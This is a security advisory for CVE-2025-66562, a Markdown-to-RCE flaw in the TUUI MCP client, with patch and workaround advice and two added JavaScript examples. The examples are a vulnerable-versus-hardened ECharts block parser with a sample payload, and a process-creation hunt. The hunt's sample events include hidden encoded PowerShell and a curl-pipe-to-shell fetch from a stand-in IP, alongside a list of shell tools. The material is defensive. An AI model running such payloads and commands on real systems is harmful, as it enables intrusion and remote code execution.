CVE-2025-66562
📋 TL;DR
CVE-2025-66562 is a critical remote code execution vulnerability in the TUUI desktop MCP client, affecting versions before 1.3.4. An attacker who gets a victim to view attacker-supplied Markdown can run arbitrary system commands on the victim's machine: JavaScript placed inside an ECharts code block executes when the Markdown is rendered (XSS in the client), and from there reaches the client's IPC layer, which can spawn processes. All users running vulnerable versions of TUUI are affected.
💻 Affected Systems
- TUUI (desktop MCP client)
⚠️ Manual Verification Required
The database entry for this CVE carries no affected-version range (none was supplied by the vendor or NVD), so automated version matching cannot decide whether a given install is affected.
Use the vendor advisory instead: it names 1.3.4 as the fixed release, so treat any earlier version as vulnerable until you have confirmed otherwise.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete system compromise allowing attacker to execute arbitrary commands, steal data, install malware, or pivot to other systems.
Likely Case
Attacker gains remote code execution on user's machine through social engineering or malicious content delivery.
If Mitigated
Running TUUI under a low-privilege account and on a segmented network limits what a spawned command can reach (no lateral movement, no access to shared credentials), but the user's own machine and data remain exposed: the command runs with whatever rights the TUUI user has.
🎯 Exploit Status
Exploitation requires user interaction (rendering attacker-supplied Markdown in TUUI) but no authentication. The chain is short, XSS in the renderer followed by an IPC call that spawns a process, so reliable exploitation is straightforward.
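The following is an added illustration of the vulnerability class described above (script inside an ECharts fenced block reaching a privileged IPC bridge that spawns processes). It is not TUUI's code and does not reproduce the project's implementation: the function names, the fence regex, the `api.runCommand` bridge and the sample document are all hypothetical, and the "spawned" command is only recorded, never executed. The unsafe parser evaluates the block as JavaScript (the pattern that lets chart authors write callbacks); the hardened parser accepts strict JSON only.

```javascript
// Added example, not TUUI's code. Hypothetical model of the
// "JavaScript in an ECharts code block -> IPC -> process spawn" chain.
// Run with: node echarts-block.js

// Three backticks, written with escapes so this file nests inside Markdown.
const FENCE = '\x60\x60\x60';
const FENCE_RE = new RegExp(FENCE + 'echarts[^\\n]*\\n([\\s\\S]*?)' + FENCE, 'g');

// Stand-in for a privileged bridge a preload script might expose to the
// renderer. It records the command instead of calling child_process.
function makeBridge() {
  const spawned = [];
  return {
    spawned,
    api: { runCommand: (cmd) => { spawned.push(cmd); return 0; } },
  };
}

// VULNERABLE PATTERN: the block is evaluated as JavaScript so chart options
// can contain functions. Any script in the block runs with the renderer's
// privileges, including access to whatever `api` exposes.
function parseEchartsBlockUnsafe(src, api) {
  return new Function('api', 'return (' + src + ');')(api);
}

// HARDENED PATTERN: the block must be a strict JSON object; nothing is
// evaluated. Callbacks, if needed, come from a fixed set chosen by the app,
// never from the document.
function parseEchartsBlockSafe(src) {
  const option = JSON.parse(src);
  if (option === null || typeof option !== 'object' || Array.isArray(option)) {
    throw new TypeError('ECharts option must be a JSON object');
  }
  return option;
}

// Render every echarts block with the given parser, recording per-block
// failures instead of aborting the whole document.
function renderMarkdown(markdown, parseBlock, api) {
  const charts = [];
  for (const m of markdown.matchAll(FENCE_RE)) {
    try {
      charts.push({ ok: true, option: parseBlock(m[1].trim(), api) });
    } catch (e) {
      charts.push({ ok: false, error: e.constructor.name });
    }
  }
  return charts;
}

// Constructed sample document: one benign chart, one attacker-controlled block.
const SAMPLE_MARKDOWN = [
  '# Quarterly report',
  '',
  FENCE + 'echarts',
  '{"series":[{"type":"bar","data":[5,20,36]}]}',
  FENCE,
  '',
  'Attacker-controlled block (constructed payload, recorded not executed):',
  '',
  FENCE + 'echarts',
  '(api.runCommand("calc.exe"), {"series":[]})',
  FENCE,
].join('\n');

function demo() {
  const vulnerable = makeBridge();
  const hardened = makeBridge();
  return {
    unsafe: renderMarkdown(SAMPLE_MARKDOWN, parseEchartsBlockUnsafe, vulnerable.api),
    unsafeSpawned: vulnerable.spawned,   // ['calc.exe']: the payload reached the bridge
    safe: renderMarkdown(SAMPLE_MARKDOWN, parseEchartsBlockSafe, hardened.api),
    safeSpawned: hardened.spawned,       // []: the script block was rejected as non-JSON
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The second fix the chain needs is on the other side of the IPC boundary: a renderer should not be able to reach a "run this command" handler at all, so even a successful script injection has nothing privileged to call.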
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 1.3.4
Vendor Advisory: https://github.com/AI-QL/tuui/security/advisories/GHSA-qjhq-rgmr-6c3g
Restart Required: Yes
Instructions:
1. Download TUUI version 1.3.4 from the official GitHub releases page.
2. Uninstall the previous version.
3. Install version 1.3.4.
4. Restart the application.
🔧 Temporary Workarounds
Disable Markdown rendering
Disable Markdown parsing in the TUUI configuration, if the version you run exposes such an option, so that ECharts code blocks are never rendered; check the TUUI documentation for the relevant setting.
Network filtering
Block delivery of external Markdown content at a web proxy or firewall. This only covers connections the proxy can see: Markdown that reaches the client by another path (for example inside responses from the servers TUUI talks to) is not filtered unless those connections also pass through it.
🧯 If You Can't Patch
- Discontinue use of TUUI until patched
- Run TUUI in isolated environment with restricted network access
🔍 How to Verify
Check if Vulnerable:
Open TUUI's version display (application menu → About, or Settings → Version) and read the version number; anything earlier than 1.3.4 is vulnerable.
Verify Fix Applied:
After updating, confirm the same dialog reports 1.3.4 or later.
📡 Detection & Monitoring
Log Indicators:
- Unusual process spawns from TUUI: shells, script hosts, or anything other than TUUI's own helper processes
- JavaScript execution errors in TUUI logs
- IPC calls to spawn processes
Network Indicators:
- TUUI fetching external Markdown content
- Unusual outbound connections from TUUI process
SIEM Query:
Process creation events where the parent image is the TUUI executable and the child image is not TUUI itself, prioritising children that are shells or scripting hosts (cmd.exe, powershell.exe, sh, bash, python). Exclude children whose image equals the parent image: desktop apps built on an Electron-style framework legitimately re-launch their own binary for renderer, GPU and utility processes, and those spawns are not indicators.
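The hunt described above, as an added example run over constructed process-creation events; this is not part of the original page or of the vendor's tooling. It assumes Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`) serialised as JSON lines, the install paths are made up, and the helper-process exclusion assumes TUUI behaves like an Electron-style app that re-launches its own binary. Children that are shells or script hosts are reported as high-confidence; any other non-TUUI child is reported for review.

```javascript
// Added example, not from the page or the vendor. Field names, paths and
// events are constructed assumptions. Run with: node tuui-hunt.js

// Shells and scripting hosts a Markdown/MCP client has no business spawning.
const SUSPICIOUS_CHILDREN = new Set([
  'cmd.exe', 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe',
  'mshta.exe', 'sh', 'bash', 'zsh', 'python', 'python3', 'curl', 'wget', 'osascript',
]);

// Last path component, lower-cased, for both Windows and POSIX paths.
function basename(path) {
  return path.split(/[\\/]/).pop().toLowerCase();
}

// Return events where a TUUI process spawned something other than one of its
// own helper processes. Children whose image equals the parent image are
// skipped: Electron-style apps re-launch their own binary (renderer, GPU,
// utility processes) and those spawns are normal.
function findSuspiciousTuuiChildren(jsonLines) {
  const hits = [];
  for (const line of jsonLines) {
    if (!line.trim()) continue;
    let ev;
    try { ev = JSON.parse(line); } catch (e) { continue; } // skip malformed lines
    const parent = basename(ev.ParentImage || '');
    const child = basename(ev.Image || '');
    if (!parent.includes('tuui')) continue;
    if (child === parent) continue; // own helper process, not an indicator
    const reason = SUSPICIOUS_CHILDREN.has(child) ? 'shell-or-script-host' : 'unexpected-child';
    hits.push({ parent: ev.ParentImage, image: ev.Image, commandLine: ev.CommandLine, reason });
  }
  return hits;
}

// Constructed sample events (Sysmon-like shape). The encoded PowerShell
// argument and the 198.51.100.7 address are made up for the example.
const SAMPLE_LINES = [
  { ParentImage: 'C:\\Program Files\\TUUI\\TUUI.exe', Image: 'C:\\Program Files\\TUUI\\TUUI.exe',
    CommandLine: 'TUUI.exe --type=renderer' },                       // benign helper
  { ParentImage: 'C:\\Program Files\\TUUI\\TUUI.exe', Image: 'C:\\Windows\\System32\\cmd.exe',
    CommandLine: 'cmd.exe /c whoami > C:\\Users\\Public\\o.txt' },   // hit
  { ParentImage: 'C:\\Program Files\\Microsoft VS Code\\Code.exe', Image: 'C:\\Windows\\System32\\cmd.exe',
    CommandLine: 'cmd.exe /c npm test' },                            // other parent, ignored
  { ParentImage: 'C:\\Program Files\\TUUI\\TUUI.exe',
    Image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    CommandLine: 'powershell.exe -nop -w hidden -enc SQBFAFgA' },    // hit
  { ParentImage: '/opt/tuui/tuui', Image: '/bin/sh',
    CommandLine: 'sh -c "curl -s http://198.51.100.7/s | sh"' },     // hit
  { ParentImage: '/opt/tuui/tuui', Image: '/usr/bin/xdg-open',
    CommandLine: 'xdg-open https://github.com/AI-QL/tuui' },         // review: unexpected child
].map((e) => JSON.stringify(e)).concat(['this line is not JSON']);

for (const hit of findSuspiciousTuuiChildren(SAMPLE_LINES)) {
  console.log(hit.reason.padEnd(22), hit.image, '<-', hit.parent, '|', hit.commandLine);
}
```

On a real fleet, tune the parent match to the installed path of the TUUI binary rather than the substring `tuui`, and add a process such as the system's URL opener to an allowlist once you have confirmed it is TUUI's normal behaviour.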